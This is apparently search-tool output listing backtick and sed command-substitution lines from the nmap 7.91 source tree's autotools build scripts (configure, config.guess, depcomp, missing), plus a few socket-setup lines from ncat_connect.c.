nmap-7.91+dfsg1/libssh2/configure:19530:need_lib_prefix='`$ECHO "$need_lib_prefix" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19531:need_version='`$ECHO "$need_version" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19532:version_type='`$ECHO "$version_type" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19533:runpath_var='`$ECHO "$runpath_var" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19534:shlibpath_var='`$ECHO "$shlibpath_var" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19535:shlibpath_overrides_runpath='`$ECHO "$shlibpath_overrides_runpath" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19536:libname_spec='`$ECHO "$libname_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19537:library_names_spec='`$ECHO "$library_names_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19538:soname_spec='`$ECHO "$soname_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19539:install_override_mode='`$ECHO "$install_override_mode" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19540:postinstall_cmds='`$ECHO "$postinstall_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19541:postuninstall_cmds='`$ECHO "$postuninstall_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19542:finish_cmds='`$ECHO "$finish_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19543:finish_eval='`$ECHO "$finish_eval" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19544:hardcode_into_libs='`$ECHO "$hardcode_into_libs" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19545:sys_lib_search_path_spec='`$ECHO "$sys_lib_search_path_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19546:configure_time_dlsearch_path='`$ECHO "$configure_time_dlsearch_path" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19547:configure_time_lt_sys_library_path='`$ECHO "$configure_time_lt_sys_library_path" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19548:hardcode_action='`$ECHO "$hardcode_action" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19549:enable_dlopen='`$ECHO "$enable_dlopen" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19550:enable_dlopen_self='`$ECHO "$enable_dlopen_self" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19551:enable_dlopen_self_static='`$ECHO "$enable_dlopen_self_static" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19552:old_striplib='`$ECHO "$old_striplib" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19553:striplib='`$ECHO "$striplib" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure-19554-
##############################################
nmap-7.91+dfsg1/libssh2/configure-19636-striplib; do
nmap-7.91+dfsg1/libssh2/configure:19637:    case \`eval \\\\\$ECHO \\\\""\\\\\$\$var"\\\\"\` in
nmap-7.91+dfsg1/libssh2/configure-19638-    *[\\\\\\\`\\"\\\$]*)
nmap-7.91+dfsg1/libssh2/configure:19639:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"\\\$\$var\\" | \\\$SED \\"\\\$sed_quote_subst\\"\\\`\\\\\\"" ## exclude from sc_prohibit_nested_quotes
nmap-7.91+dfsg1/libssh2/configure-19640-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-19667-configure_time_lt_sys_library_path; do
nmap-7.91+dfsg1/libssh2/configure:19668:    case \`eval \\\\\$ECHO \\\\""\\\\\$\$var"\\\\"\` in
nmap-7.91+dfsg1/libssh2/configure-19669-    *[\\\\\\\`\\"\\\$]*)
nmap-7.91+dfsg1/libssh2/configure:19670:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"\\\$\$var\\" | \\\$SED -e \\"\\\$double_quote_subst\\" -e \\"\\\$sed_quote_subst\\" -e \\"\\\$delay_variable_subst\\"\\\`\\\\\\"" ## exclude from sc_prohibit_nested_quotes
nmap-7.91+dfsg1/libssh2/configure-19671-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-19764-fi
nmap-7.91+dfsg1/libssh2/configure:19765:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/libssh2/configure-19766-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-19781-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/libssh2/configure:19782:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/libssh2/configure-19783-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/libssh2/configure-19787-
nmap-7.91+dfsg1/libssh2/configure:19788:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/libssh2/configure-19789-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-19925-for ac_last_try in false false :; do
nmap-7.91+dfsg1/libssh2/configure:19926:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/libssh2/configure-19927-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-20057-      esac
nmap-7.91+dfsg1/libssh2/configure:20058:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/libssh2/configure-20059-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/libssh2/configure-20116-*)
nmap-7.91+dfsg1/libssh2/configure:20117:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/libssh2/configure-20118-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/libssh2/configure:20119:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/libssh2/configure-20120-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/libssh2/configure-20177-/@mandir@/p'
nmap-7.91+dfsg1/libssh2/configure:20178:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/libssh2/configure-20179-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-20194-
nmap-7.91+dfsg1/libssh2/configure:20195:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/libssh2/configure-20196-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/libssh2/configure-20222-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/libssh2/configure:20223:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/libssh2/configure-20224-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/libssh2/configure-20268-    * )
nmap-7.91+dfsg1/libssh2/configure:20269:      _am_stamp_count=`expr $_am_stamp_count + 1` ;;
nmap-7.91+dfsg1/libssh2/configure-20270-  esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-20323-    # Strip MF so we end up with the name of the file.
nmap-7.91+dfsg1/libssh2/configure:20324:    am_mf=`$as_echo "$am_mf" | sed -e 's/:.*$//'`
nmap-7.91+dfsg1/libssh2/configure-20325-    # Check whether this is an Automake generated Makefile which includes
##############################################
nmap-7.91+dfsg1/libssh2/configure-20877-    *:)
nmap-7.91+dfsg1/libssh2/configure:20878:        eval $1=\"`$ECHO $2 | $SED 's/:/ /g'` \$$1\"
nmap-7.91+dfsg1/libssh2/configure-20879-        ;;
nmap-7.91+dfsg1/libssh2/configure-20880-    x:*)
nmap-7.91+dfsg1/libssh2/configure:20881:        eval $1=\"\$$1 `$ECHO $2 | $SED 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/configure-20882-        ;;
nmap-7.91+dfsg1/libssh2/configure-20883-    *::*)
nmap-7.91+dfsg1/libssh2/configure:20884:        eval $1=\"\$$1\ `$ECHO $2 | $SED -e 's/.*:://' -e 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/configure:20885:        eval $1=\"`$ECHO $2 | $SED -e 's/::.*//' -e 's/:/ /g'`\ \$$1\"
nmap-7.91+dfsg1/libssh2/configure-20886-        ;;
nmap-7.91+dfsg1/libssh2/configure-20887-    *)
nmap-7.91+dfsg1/libssh2/configure:20888:        eval $1=\"`$ECHO $2 | $SED 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/configure-20889-        ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-20904-    done
nmap-7.91+dfsg1/libssh2/configure:20905:    func_cc_basename_result=`$ECHO "$cc_temp" | $SED "s%.*/%%; s%^$host_alias-%%"`
nmap-7.91+dfsg1/libssh2/configure-20906-}
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.am-56-	find $(distdir) -name "*.dist" -exec rm {} \;
nmap-7.91+dfsg1/libssh2/Makefile.am:57:	(distit=`find $(srcdir) -name "*.dist"`; \
nmap-7.91+dfsg1/libssh2/Makefile.am-58-	for file in $$distit; do \
nmap-7.91+dfsg1/libssh2/Makefile.am:59:	  strip=`echo $$file | sed -e s/^$(srcdir)// -e s/\.dist//`; \
nmap-7.91+dfsg1/libssh2/Makefile.am-60-	  cp $$file $(distdir)$$strip; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.am-102-	win32_srcs='$(WIN32SOURCES)'; \
nmap-7.91+dfsg1/libssh2/Makefile.am:103:	sorted_srcs=`for file in $$win32_srcs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.am-104-	for file in $$sorted_srcs; do \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.am-114-	win32_hdrs='$(WIN32HEADERS)'; \
nmap-7.91+dfsg1/libssh2/Makefile.am:115:	sorted_hdrs=`for file in $$win32_hdrs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.am-116-	for file in $$sorted_hdrs; do \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.am-134-	win32_srcs='$(WIN32SOURCES)'; \
nmap-7.91+dfsg1/libssh2/Makefile.am:135:	sorted_srcs=`for file in $$win32_srcs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.am-136-	for file in $$sorted_srcs; do \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.am-140-	win32_hdrs='$(WIN32HEADERS)'; \
nmap-7.91+dfsg1/libssh2/Makefile.am:141:	sorted_hdrs=`for file in $$win32_hdrs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.am-142-	for file in $$sorted_hdrs; do \
##############################################
nmap-7.91+dfsg1/depcomp-69-  sed 's|[^\\/]*$|'${DEPDIR-.deps}'/&|;s|\.\([^.]*\)$|.P\1|;s|Pobj$|Po|'`}
nmap-7.91+dfsg1/depcomp:70:tmpdepfile=${tmpdepfile-`echo "$depfile" | sed 's/\.\([^.]*\)$/.T\1/'`}
nmap-7.91+dfsg1/depcomp-71-
##############################################
nmap-7.91+dfsg1/depcomp-217-  # Version 6 uses the directory in both cases.
nmap-7.91+dfsg1/depcomp:218:  stripped=`echo "$object" | sed 's/\(.*\)\..*$/\1/'`
nmap-7.91+dfsg1/depcomp-219-  tmpdepfile="$stripped.u"
##############################################
nmap-7.91+dfsg1/depcomp-228-  else
nmap-7.91+dfsg1/depcomp:229:    stripped=`echo "$stripped" | sed 's,^.*/,,'`
nmap-7.91+dfsg1/depcomp-230-    tmpdepfile="$stripped.u"
##############################################
nmap-7.91+dfsg1/depcomp-242-    # Do two passes, one to just change these to
nmap-7.91+dfsg1/depcomp:243:    # `$object: dependent.h' and one to simply `dependent.h:'.
nmap-7.91+dfsg1/depcomp-244-    sed -e "s,^$outname:,$object :," < "$tmpdepfile" > "$depfile"
##############################################
nmap-7.91+dfsg1/depcomp-283-  # Do two passes, one to just change these to
nmap-7.91+dfsg1/depcomp:284:  # `$object: dependent.h' and one to simply `dependent.h:'.
nmap-7.91+dfsg1/depcomp-285-  sed "s,^[^:]*:,$object :," < "$tmpdepfile" > "$depfile"
##############################################
nmap-7.91+dfsg1/depcomp-299-  # Much of this is similar to the tru64 case; see comments there.
nmap-7.91+dfsg1/depcomp:300:  dir=`echo "$object" | sed -e 's|/[^/]*$|/|'`
nmap-7.91+dfsg1/depcomp-301-  test "x$dir" = "x$object" && dir=
nmap-7.91+dfsg1/depcomp:302:  base=`echo "$object" | sed -e 's|^.*/||' -e 's/\.o$//' -e 's/\.lo$//'`
nmap-7.91+dfsg1/depcomp-303-  if test "$libtool" = yes; then
##############################################
nmap-7.91+dfsg1/depcomp-338-   # Subdirectories are respected.
nmap-7.91+dfsg1/depcomp:339:   dir=`echo "$object" | sed -e 's|/[^/]*$|/|'`
nmap-7.91+dfsg1/depcomp-340-   test "x$dir" = "x$object" && dir=
nmap-7.91+dfsg1/depcomp:341:   base=`echo "$object" | sed -e 's|^.*/||' -e 's/\.o$//' -e 's/\.lo$//'`
nmap-7.91+dfsg1/depcomp-342-
##############################################
nmap-7.91+dfsg1/depcomp-477-  done
nmap-7.91+dfsg1/depcomp:478:  obj_suffix="`echo $object | sed 's/^.*\././'`"
nmap-7.91+dfsg1/depcomp-479-  touch "$tmpdepfile"
##############################################
nmap-7.91+dfsg1/ncat/config.guess-34-
nmap-7.91+dfsg1/ncat/config.guess:35:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/ncat/config.guess-36-
##############################################
nmap-7.91+dfsg1/ncat/config.guess-102-: ${TMPDIR=/tmp} ;
nmap-7.91+dfsg1/ncat/config.guess:103: { tmp=`(umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null` && test -n "$tmp" && test -d "$tmp" ; } ||
nmap-7.91+dfsg1/ncat/config.guess-104- { test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir $tmp) ; } ||
##############################################
nmap-7.91+dfsg1/ncat/config.guess-151-	EOF
nmap-7.91+dfsg1/ncat/config.guess:152:	eval `$CC_FOR_BUILD -E $dummy.c 2>/dev/null | grep '^LIBC' | sed 's, ,,g'`
nmap-7.91+dfsg1/ncat/config.guess-153-	;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-209-	    *)
nmap-7.91+dfsg1/ncat/config.guess:210:		release=`echo ${UNAME_RELEASE}|sed -e 's/[-_].*/\./'`
nmap-7.91+dfsg1/ncat/config.guess-211-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-240-	*4.0)
nmap-7.91+dfsg1/ncat/config.guess:241:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $3}'`
nmap-7.91+dfsg1/ncat/config.guess-242-		;;
nmap-7.91+dfsg1/ncat/config.guess-243-	*5.*)
nmap-7.91+dfsg1/ncat/config.guess:244:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $4}'`
nmap-7.91+dfsg1/ncat/config.guess-245-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-250-	# types through head -n 1, so we only detect the type of CPU 0.
nmap-7.91+dfsg1/ncat/config.guess:251:	ALPHA_CPU_TYPE=`/usr/sbin/psrinfo -v | sed -n -e 's/^  The alpha \(.*\) processor.*$/\1/p' | head -n 1`
nmap-7.91+dfsg1/ncat/config.guess-252-	case "$ALPHA_CPU_TYPE" in
##############################################
nmap-7.91+dfsg1/ncat/config.guess-288-	# 1.2 uses "1.2" for uname -r.
nmap-7.91+dfsg1/ncat/config.guess:289:	echo ${UNAME_MACHINE}-dec-osf`echo ${UNAME_RELEASE} | sed -e 's/^[PVTX]//' | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz'`
nmap-7.91+dfsg1/ncat/config.guess-290-	# Reset EXIT trap before exiting to avoid spurious non-zero exit code.
##############################################
nmap-7.91+dfsg1/ncat/config.guess-348-    s390x:SunOS:*:*)
nmap-7.91+dfsg1/ncat/config.guess:349:	echo ${UNAME_MACHINE}-ibm-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/ncat/config.guess-350-	exit ;;
nmap-7.91+dfsg1/ncat/config.guess-351-    sun4H:SunOS:5.*:*)
nmap-7.91+dfsg1/ncat/config.guess:352:	echo sparc-hal-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/ncat/config.guess-353-	exit ;;
nmap-7.91+dfsg1/ncat/config.guess-354-    sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*)
nmap-7.91+dfsg1/ncat/config.guess:355:	echo sparc-sun-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/ncat/config.guess-356-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-373-	fi
nmap-7.91+dfsg1/ncat/config.guess:374:	echo ${SUN_ARCH}-pc-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/ncat/config.guess-375-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-379-	# it's likely to be more like Solaris than SunOS4.
nmap-7.91+dfsg1/ncat/config.guess:380:	echo sparc-sun-solaris3`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/ncat/config.guess-381-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-388-	# Japanese Language versions have a version number like `4.1.3-JL'.
nmap-7.91+dfsg1/ncat/config.guess:389:	echo sparc-sun-sunos`echo ${UNAME_RELEASE}|sed -e 's/-/_/'`
nmap-7.91+dfsg1/ncat/config.guess-390-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-394-    sun*:*:4.2BSD:*)
nmap-7.91+dfsg1/ncat/config.guess:395:	UNAME_RELEASE=`(sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null`
nmap-7.91+dfsg1/ncat/config.guess-396-	test "x${UNAME_RELEASE}" = "x" && UNAME_RELEASE=3
##############################################
nmap-7.91+dfsg1/ncat/config.guess-476-	$CC_FOR_BUILD -o $dummy $dummy.c &&
nmap-7.91+dfsg1/ncat/config.guess:477:	  dummyarg=`echo "${UNAME_RELEASE}" | sed -n 's/\([0-9]*\).*/\1/p'` &&
nmap-7.91+dfsg1/ncat/config.guess:478:	  SYSTEM_NAME=`$dummy $dummyarg` &&
nmap-7.91+dfsg1/ncat/config.guess-479-	    { echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/ncat/config.guess-532-    *:IRIX*:*:*)
nmap-7.91+dfsg1/ncat/config.guess:533:	echo mips-sgi-irix`echo ${UNAME_RELEASE}|sed -e 's/-/_/g'`
nmap-7.91+dfsg1/ncat/config.guess-534-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-562-EOF
nmap-7.91+dfsg1/ncat/config.guess:563:		if $CC_FOR_BUILD -o $dummy $dummy.c && SYSTEM_NAME=`$dummy`
nmap-7.91+dfsg1/ncat/config.guess-564-		then
##############################################
nmap-7.91+dfsg1/ncat/config.guess-575-    *:AIX:*:[4567])
nmap-7.91+dfsg1/ncat/config.guess:576:	IBM_CPU_ID=`/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }'`
nmap-7.91+dfsg1/ncat/config.guess-577-	if /usr/sbin/lsattr -El ${IBM_CPU_ID} | grep ' POWER' >/dev/null 2>&1; then
##############################################
nmap-7.91+dfsg1/ncat/config.guess-611-    9000/[34678]??:HP-UX:*:*)
nmap-7.91+dfsg1/ncat/config.guess:612:	HPUX_REV=`echo ${UNAME_RELEASE}|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/ncat/config.guess-613-	case "${UNAME_MACHINE}" in
##############################################
nmap-7.91+dfsg1/ncat/config.guess-665-EOF
nmap-7.91+dfsg1/ncat/config.guess:666:		    (CCOPTS= $CC_FOR_BUILD -o $dummy $dummy.c 2>/dev/null) && HP_ARCH=`$dummy`
nmap-7.91+dfsg1/ncat/config.guess-667-		    test -z "$HP_ARCH" && HP_ARCH=hppa
##############################################
nmap-7.91+dfsg1/ncat/config.guess-693-    ia64:HP-UX:*:*)
nmap-7.91+dfsg1/ncat/config.guess:694:	HPUX_REV=`echo ${UNAME_RELEASE}|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/ncat/config.guess-695-	echo ia64-hp-hpux${HPUX_REV}
##############################################
nmap-7.91+dfsg1/ncat/config.guess-723-EOF
nmap-7.91+dfsg1/ncat/config.guess:724:	$CC_FOR_BUILD -o $dummy $dummy.c && SYSTEM_NAME=`$dummy` &&
nmap-7.91+dfsg1/ncat/config.guess-725-		{ echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/ncat/config.guess-794-	FUJITSU_SYS=`uname -p | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/\///'`
nmap-7.91+dfsg1/ncat/config.guess:795:	FUJITSU_REL=`echo ${UNAME_RELEASE} | sed -e 's/ /_/'`
nmap-7.91+dfsg1/ncat/config.guess-796-	echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/ncat/config.guess-799-	FUJITSU_SYS=`uname -p | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/\///'`
nmap-7.91+dfsg1/ncat/config.guess:800:	FUJITSU_REL=`echo ${UNAME_RELEASE} | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/ /_/'`
nmap-7.91+dfsg1/ncat/config.guess-801-	echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/ncat/config.guess-815-	    amd64)
nmap-7.91+dfsg1/ncat/config.guess:816:		echo x86_64-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;;
nmap-7.91+dfsg1/ncat/config.guess-817-	    *)
nmap-7.91+dfsg1/ncat/config.guess:818:		echo ${UNAME_PROCESSOR}-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;;
nmap-7.91+dfsg1/ncat/config.guess-819-	esac
##############################################
nmap-7.91+dfsg1/ncat/config.guess-873-    prep*:SunOS:5.*:*)
nmap-7.91+dfsg1/ncat/config.guess:874:	echo powerpcle-unknown-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/ncat/config.guess-875-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-877-	# the GNU system
nmap-7.91+dfsg1/ncat/config.guess:878:	echo `echo ${UNAME_MACHINE}|sed -e 's,[-/].*$,,'`-unknown-${LIBC}`echo ${UNAME_RELEASE}|sed -e 's,/.*$,,'`
nmap-7.91+dfsg1/ncat/config.guess-879-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-881-	# other systems with GNU libc and userland
nmap-7.91+dfsg1/ncat/config.guess:882:	echo ${UNAME_MACHINE}-unknown-`echo ${UNAME_SYSTEM} | sed 's,^[^/]*/,,' | tr '[A-Z]' '[a-z]'``echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'`-${LIBC}
nmap-7.91+dfsg1/ncat/config.guess-883-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-969-EOF
nmap-7.91+dfsg1/ncat/config.guess:970:	eval `$CC_FOR_BUILD -E $dummy.c 2>/dev/null | grep '^CPU'`
nmap-7.91+dfsg1/ncat/config.guess-971-	test x"${CPU}" != x && { echo "${CPU}-unknown-linux-${LIBC}"; exit; }
##############################################
nmap-7.91+dfsg1/ncat/config.guess-1063-    i*86:*:4.*:* | i*86:SYSTEM_V:4.*:*)
nmap-7.91+dfsg1/ncat/config.guess:1064:	UNAME_REL=`echo ${UNAME_RELEASE} | sed 's/\/MP$//'`
nmap-7.91+dfsg1/ncat/config.guess-1065-	if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then
##############################################
nmap-7.91+dfsg1/ncat/config.guess-1263-	fi
nmap-7.91+dfsg1/ncat/config.guess:1264:	if test `echo "$UNAME_RELEASE" | sed -e 's/\..*//'` -le 10 ; then
nmap-7.91+dfsg1/ncat/config.guess-1265-	    if [ "$CC_FOR_BUILD" != 'no_compiler_found' ]; then
##############################################
nmap-7.91+dfsg1/ncat/config.guess-1348-    *:DragonFly:*:*)
nmap-7.91+dfsg1/ncat/config.guess:1349:	echo ${UNAME_MACHINE}-unknown-dragonfly`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'`
nmap-7.91+dfsg1/ncat/config.guess-1350-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/config.guess-1361-    i*86:skyos:*:*)
nmap-7.91+dfsg1/ncat/config.guess:1362:	echo ${UNAME_MACHINE}-pc-skyos`echo ${UNAME_RELEASE}` | sed -e 's/ .*$//'
nmap-7.91+dfsg1/ncat/config.guess-1363-	exit ;;
##############################################
nmap-7.91+dfsg1/ncat/ncat_connect.c-595-            loguser("Host %s will be resolved by the proxy.\n", o.target);
nmap-7.91+dfsg1/ncat/ncat_connect.c:596:        socks4msg.address = inet_addr("0.0.0.1");
nmap-7.91+dfsg1/ncat/ncat_connect.c-597-        if (datalen + strlen(o.target) >= sizeof(socks4msg.data)) {
##############################################
nmap-7.91+dfsg1/ncat/ncat_connect.c-913-     case AF_INET:
nmap-7.91+dfsg1/ncat/ncat_connect.c:914:       nsock_iod_set_localaddr(nsi, &srcaddr.storage,
nmap-7.91+dfsg1/ncat/ncat_connect.c-915-           sizeof(srcaddr.in));
##############################################
nmap-7.91+dfsg1/ncat/ncat_connect.c-918-     case AF_INET6:
nmap-7.91+dfsg1/ncat/ncat_connect.c:919:       nsock_iod_set_localaddr(nsi, &srcaddr.storage,
nmap-7.91+dfsg1/ncat/ncat_connect.c-920-           sizeof(srcaddr.in6));
##############################################
nmap-7.91+dfsg1/ncat/ncat_connect.c-924-     case AF_UNIX:
nmap-7.91+dfsg1/ncat/ncat_connect.c:925:       nsock_iod_set_localaddr(nsi, &srcaddr.storage,
nmap-7.91+dfsg1/ncat/ncat_connect.c-926-           SUN_LEN((struct sockaddr_un *)&srcaddr.storage));
##############################################
nmap-7.91+dfsg1/ncat/ncat_connect.c-929-     default:
nmap-7.91+dfsg1/ncat/ncat_connect.c:930:       nsock_iod_set_localaddr(nsi, &srcaddr.storage,
nmap-7.91+dfsg1/ncat/ncat_connect.c-931-           sizeof(srcaddr.storage));
##############################################
nmap-7.91+dfsg1/ncat/missing-92-         from any GNU archive site."
nmap-7.91+dfsg1/ncat/missing:93:    files=`sed -n 's/^[ ]*A[CM]_CONFIG_HEADER(\([^)]*\)).*/\1/p' $configure_ac`
nmap-7.91+dfsg1/ncat/missing-94-    test -z "$files" && files="config.h"
##############################################
nmap-7.91+dfsg1/ncat/missing-127-	*.y)
nmap-7.91+dfsg1/ncat/missing:128:	    SRCFILE=`echo "$LASTARG" | sed 's/y$/c/'`
nmap-7.91+dfsg1/ncat/missing-129-	    if [ -f "$SRCFILE" ]; then
##############################################
nmap-7.91+dfsg1/ncat/missing-131-	    fi
nmap-7.91+dfsg1/ncat/missing:132:	    SRCFILE=`echo "$LASTARG" | sed 's/y$/h/'`
nmap-7.91+dfsg1/ncat/missing-133-	    if [ -f "$SRCFILE" ]; then
##############################################
nmap-7.91+dfsg1/ncat/missing-157-	*.l)
nmap-7.91+dfsg1/ncat/missing:158:	    SRCFILE=`echo "$LASTARG" | sed 's/l$/c/'`
nmap-7.91+dfsg1/ncat/missing-159-	    if [ -f "$SRCFILE" ]; then
##############################################
nmap-7.91+dfsg1/ncat/missing-177-         the \`GNU make' package.  Grab either from any GNU archive site."
nmap-7.91+dfsg1/ncat/missing:178:    file=`echo "$*" | sed -n 's/.*-o \([^ ]*\).*/\1/p'`
nmap-7.91+dfsg1/ncat/missing-179-    if test -z "$file"; then
nmap-7.91+dfsg1/ncat/missing:180:      file=`echo "$*" | sed 's/.* \([^ ]*\) *$/\1/'`
nmap-7.91+dfsg1/ncat/missing:181:      file=`sed -n '/^@setfilename/ { s/.* \([^ ]*\) *$/\1/; p; q; }' $file`
nmap-7.91+dfsg1/ncat/missing-182-    fi
##############################################
nmap-7.91+dfsg1/ncat/config.sub-52-
nmap-7.91+dfsg1/ncat/config.sub:53:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/ncat/config.sub-54-
##############################################
nmap-7.91+dfsg1/ncat/config.sub-115-# Here we must recognize all the valid KERNEL-OS combinations.
